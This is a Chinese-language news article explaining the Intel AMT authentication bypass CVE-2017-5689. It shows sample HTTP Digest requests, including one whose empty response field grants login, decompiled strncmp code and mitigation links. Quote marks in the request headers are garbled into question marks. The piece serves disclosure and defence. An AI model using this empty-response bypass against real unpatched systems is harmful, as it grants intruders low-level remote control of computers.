只要使用一個空的登錄字元串！即可遠程劫持採用英特爾不安全晶元的計算機

這個漏洞讓不法分子得以控制使用vPro和AMT的系統。

你可以遠程控制採用易受攻擊的英特爾晶元的計算機，只要向它們發送空的驗證字元串。

你沒有看錯，確實如此！本該要求你發送一個密碼哈希值，你卻發送了零位元組，什麼都沒有。想想你會有怎樣的回報？居然可以通過網路――如果管理介面面向公共Web的話，還可以通過互聯網，獲得系統硬體的底層訪問權，許可權很大。

瞧瞧下一次英特爾（市值1800億美元的國際半導體巨頭）再如何談論自己對待安全有多重視了。

概述一下：英特爾為其商務處理器和企業級處理器提供一種名為AMT的遠程管理工具包；這個軟體是這家晶元巨頭的vPro套件的一部分，在固件層面運行，你使用的Windows、Linux或其他任何操作系統根本看不見它。代碼在英特爾的管理引擎（Management Engine）上運行，這好比是你計算機中的一個小型計算機，全面控制硬體，可與網路埠直接聯繫，不管運行的是什麼樣的操作系統和應用程序，都可以控制設備。

AMT旨在讓IT管理員可以遠程登錄進入到系統底層，那樣他們可以重啟崩潰的機器，修復和調整操作系統，安裝新的操作系統，訪問虛擬串列控制台，或者通過VNC獲得全面的遠程桌面訪問。它簡直就是上帝模式（god mode）。

AMT通常由密碼保護。本周卻爆出了可以繞過這道驗證的消息，讓不法分子一旦潛入企業網路內部，就可以遠程掌控系統。這個嚴重安全漏洞名為CVE-2017-5689。雖然英特爾已給代碼打上了補丁，但用戶仍得向硬體供應商索要必要的更新版，以便安裝。

今天我們獲悉，鑽這個安全漏洞的空子輕而易舉，不需要密碼，誰都可以控制易受攻擊的系統――我們仍在等待相應的補丁。

AMT是通過一種普通的Web介面經由網路來訪問的：該服務偵聽埠16992和埠16993。用瀏覽器訪問該服務會彈出提示，要求輸入密碼，這個密碼是使用標準的HTTP Digest驗證技術來發送的：使用來自AMT固件的隨機數（nonce）以及另外幾個元數據，對用戶和密碼進行哈希處理（即加密）。這個經過加密的響應由英特爾的AMT軟體來核實，驗證是否有效；如果有效，就將訪問權授予管理介面。

但是如果你發送空的響應，固件就會誤以為這是有效的響應，讓你長行直入。這意味著，如果你使用代理，將響應改成空的字元串，或者以其他方式設置瀏覽器，發送空的HTTP Digest驗證響應，就可以繞過密碼核實機制。

大致說來，在後台，你的瀏覽器通常會向AMT服務發送類似這樣的內容，這包括哈希響應字元串，含有用戶名、密碼和伺服器隨機數：

GET /index.htm HTTP/1.1

Host: 192.168.1.2:16992

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.2:16992/logon.htm

Connection: keep-alive

Authorization: Digest username=?admin?,

realm=?Digest:048A0000000000000000000000000000?,

nonce=?Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J?, uri=?/index.htm?,

cnonce=?9c5beca4011eea5c?

好了，對此耍個小花招――使用代理或類似的工具，只要去掉響應哈希，改而發送：

GET /index.htm HTTP/1.1

Host: 127.0.0.1:16992

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Authorization: Digest username=?admin?,

realm=?Digest:048A0000000000000000000000000000?,

nonce=?qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n?, uri=?/index.htm?, response=??,

而英特爾的「保安」（固件）會讓你進入，儘管你實際上根本沒有密碼，只是向門衛閃了一下車燈：

HTTP/1.1 200 OK

Date: Thu, 4 May 2017 16:09:17 GMT

Server: AMT

Content-Type: text/html

Transfer-Encoding: chunked

Cache-Control: no cache

Expires: Thu, 26 Oct 1995 00:00:00 GMT

如果你在英特爾的固件裡面搗鼓一番，會發現底層的這個寶貝：機器碼，機器碼反編碼成類似以下內容的C代碼：

if(strncmp(computed_response, user_response, response_length))

deny_access();

你可能也知道了，這個標準函數僅僅比較兩個字元串中每一個的response_length位元組，看看它們是不是一樣：加以比較的兩個字元串是試圖登錄的那個人發送的驗證響應（user_response）和服務要求的響應（computed_response）。如果兩者相符，密碼肯定對的，所以該函數返回零，代碼繼續授予訪問權。如果兩個字元串不一樣，該函數返回值是非零，這意味著密碼不對，所以拒絕訪問。到目前為止，一切很好。

遺憾的是，response_length是用user_response來計算的，所以如果提供的是空字元串，長度為零，沒有位元組被檢查，因而沒有位元組是不一樣的；不出所料，strncmp()返回零，表明驗證成功。因而，空的響應字元串被認為有效而被放行，實際上明明是無效的。

英特爾其實應該檢查兩個字元串長度一樣，因為有效的響應始終是32位元組的MD5哈希值。

發現這個漏洞要感謝Embedi，這家公司對代碼作了逆向工程處理（https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf），早在3月份就向英特爾報告了這個漏洞。Tenable也對二進位代碼作了一番研究，本周早些時候得出了同樣的結論。

英特爾已在此（https://newsroom.intel.com/news/important-security-information-intel-manageability-firmware/）發布了關於該漏洞的另外一些信息，包括工具鏈接（該工具可以檢查系統是不是高危系統）、支持聯繫人的相關信息以及減小威脅的應對措施列表。

還有這個第三方工具（https://github.com/bartblaze/Disable-Intel-AMT）可用來禁用Windows系統的AMT。

我們獲悉，這個漏洞存在於一些但並非所有的英特爾處理器晶元組（從今天的Kaby Lake系列，直到早至2010年的系列）：它主要影響商務PC、專業工作站和小型伺服器，而不是影響面向普通人的設備。不過，這家晶元巨頭今天承認，「消費者和小公司」到頭來使用的矽片可能採用這項易受攻擊的技術。

如果你使用啟用了vPro的處理器，又在自己的網路上配置了AMT版本6至11.6，絕對面臨上述安全漏洞帶來的風險。這還影響英特爾的標準可管理性（ISM）和小企業技術（SBT）固件。我們建議你使用英特爾的實用工具，仔細檢查是不是存在這個漏洞帶來的安全隱患。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！